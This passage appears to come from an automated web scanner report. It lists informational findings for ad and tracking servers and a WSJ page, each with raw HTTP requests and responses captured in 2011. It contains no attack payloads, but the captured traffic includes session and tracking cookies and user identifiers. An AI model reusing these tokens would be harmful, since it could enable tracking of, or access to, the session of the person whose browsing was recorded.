L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#^@9!!!!#<x2wq!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g]5!!!!)<xdAS!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu~~!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(V0!!!!$<xj^Z!$)DI!!!!#<x2wq!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:09 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0418.2rm.ac4
Set-Cookie: ih="b!!!!3!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!#<xjve!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: vuday1=Ajz6%!?-x!@eJsf; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!%!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<y+o`M.jTN!!L7_!!E)$!$XwM!,+Z*!#WUS!!!%%!?5%!),1*7!ZmB)!!28h!$8eP~~~~~~<xjve<yi^'M.jTN"; path=/; expires=Tue, 30-Apr-2013 23:34:09 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=t07yR!?-x!TDjBo; path=/; expires=Mon, 02-May-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 01 May 2011 23:34:09 GMT
Pragma: no-cache
Content-Length: 1185
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(5589522);}
</script><IFRAME SRC="htt
...[SNIP]...
33.5. http://ads-vrx.adbrite.com/adserver/display_iab_ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /adserver/display_iab_ads

Request

GET /adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934 HTTP/1.1
Host: ads-vrx.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:39 GMT
Content-Length: 980

<html><head></head><body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- eyewonder -->

<script language="JavaScript" src="http://guru.sitescout.com/tag.jsp?pid=66738FF&w=300&h=250&rnd=6848350&cm=h
...[SNIP]...
33.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
33.7. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /CC4A2528-2176-11DF-BB34-61FFECADD848

Request

GET /CC4A2528-2176-11DF-BB34-61FFECADD848 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:57:35 GMT
Server: Barista/1.1-(eanjbj)
Connection: Close
Content-Length: 8991
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid160x600aquabulgeads-CC4A2528-2176-11DF-BB34-61FFECADD848 { width: 160px; left: 0; font-family: sans-serif; position: relative; disp
...[SNIP]...
33.8. http://danilolee.com/cgi-sys/suspendedpage.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://danilolee.com
Path:   /cgi-sys/suspendedpage.cgi

Request

GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: danilolee.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:04 GMT
Server: Apache
Content-Length: 810
Content-Type: text/html

<HTML>
<head>
<style>
a { font-family: arial, verdana; font-size: 14px; color: #000000; text-decoration: none; }
a:hover { text-decoration: underline; }


body { background-color: #FFF; font-family: a
...[SNIP]...
33.9. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Mon, 02 May 2011 01:55:58 GMT
Server: HTTP server
Content-Length: 385

<HTML><BODY><img src="http://cm.g.doubleclick.net/pixel?nid=exelate&j=0" width="1" height="1"></img><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=1031" width="0" height="0" border="
...[SNIP]...
33.10. http://online.wsj.com/internal/ModTwitWSJMarkets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /internal/ModTwitWSJMarkets.htm

Request

GET /internal/ModTwitWSJMarkets.htm?dojo.preventCache=1304320341570 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704473104576293321328159878.html?mod=WSJ_newsreel_markets
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=df918f0b-504c-492b-8824-dc0b9235aa6b; s_dbfe=1303590600843; wsjregion=na%2cus; s_vnum=1306182600841%26vn%3D2; __utmz=1.1304311304.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2267%22%5D%2C%22low%22%3A%5B%2247%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DMon%2C%2002%20May%202011%2005%3A00%3A36%20GMT%7C%7CweatherCode%3D10005; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B%7C%7CFREEREGSCRIMCOUNT%3Dnull; _chartbeat2=9b7spduc6sokdd53; rsi_csl=; rsi_segs=; __utma=1.1864565573.1304311304.1304311304.1304311304.1; __utmc=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:00 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 15:23:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 02:43:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html
Content-Length: 3277


<div class="headlineSummary twHeadline">
<h3>Latest Tweets</h3>
</div>
<div class="twLatestTweets headlineSummary twLatestTweets-av">
<ul class="twTweetsItem">


<li>


<a href="http://twitt
...[SNIP]...
33.11. http://pixel.invitemedia.com/data_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=9&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1304303011+ \"2\": 1304243633}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 512
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...
33.12. http://tags.bluekai.com/site/3945  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Request

